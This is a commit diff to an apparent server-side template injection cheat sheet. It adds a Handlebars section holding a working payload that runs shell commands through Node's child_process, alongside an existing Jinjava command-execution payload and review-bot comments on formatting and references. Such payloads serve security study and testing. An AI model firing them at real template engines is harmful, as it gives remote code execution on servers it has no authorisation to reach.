parent cc95f4e386
commit 76e6f7dc95
|
@ -44,6 +44,7 @@
|
|||
* [Jinjava](#jinjava)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
* [Handlebars](#handlebars)
|
||||
* [ASP.NET Razor](#aspnet-razor)
|
||||
* [Basic injection](#basic-injection)
|
||||
* [Command execution](#command-execution)
|
||||
|
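Review bot: The new `* [Handlebars](#handlebars)` entry has no nested item for the section's "Command Execution" subsection, while the Jinjava and ASP.NET Razor entries on either side of it both list their subsections. Add a nested `* [Command execution](#command-execution)` line for consistency. The visible entries already point several sections at the same `#basic-injection` and `#command-execution` targets, so a further link with that target would not be unique unless the headings are disambiguated.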
@ -476,6 +477,37 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
```
|
||||
|
||||
## Handlebars
|
||||
|
||||
### Command Execution
|
||||
|
||||
```handlebars
|
||||
{{#with "s" as |string|}}
|
||||
{{#with "e"}}
|
||||
{{#with split as |conslist|}}
|
||||
{{this.pop}}
|
||||
{{this.push (lookup string.sub "constructor")}}
|
||||
{{this.pop}}
|
||||
{{#with string.split as |codelist|}}
|
||||
{{this.pop}}
|
||||
{{this.push "return require('child_process').execSync('ls -la');"}}
|
||||
{{this.pop}}
|
||||
{{#each conslist}}
|
||||
{{#with (string.sub.apply 0 codelist)}}
|
||||
{{this}}
|
||||
{{/with}}
|
||||
{{/each}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
{{/with}}
|
||||
```
|
||||
|
||||
### References
|
||||
|
||||
- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
||||
- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
|
||||
|
||||
## ASP.NET Razor
|
||||
|
||||
### Basic injection
|
||||
|
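Review bot: The Handlebars section goes straight from the heading to the payload with no sentence on when it applies. The line `{{this.push "return require('child_process').execSync('ls -la');"}}` depends on `require` being reachable, which means a template compiled server-side under Node.js from user-controlled input. Add one line stating that precondition and the Handlebars version the payload was checked against, so a reader can tell whether a given deployment is affected. Two smaller points: `### Command Execution` is capitalised differently from the `Command execution` entries in the table of contents, and the first reference's link text has a trailing space before `]`.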
@ -510,4 +542,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||
* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
|
||||
* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection)
|
||||
* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
|
||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
||||
* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
|
||||
|
|
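Review bot: The last entry, `Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019`, appears twice with identical visible text in a hunk that maps 4 lines to 4 lines, which points to a whitespace or end-of-file newline change only. If that is an editor side effect, drop it from this commit or mention it in the commit message. Separately, the two Handlebars links added earlier in this commit sit under a section-local `### References` heading rather than in this list; pick one place so the references are not split.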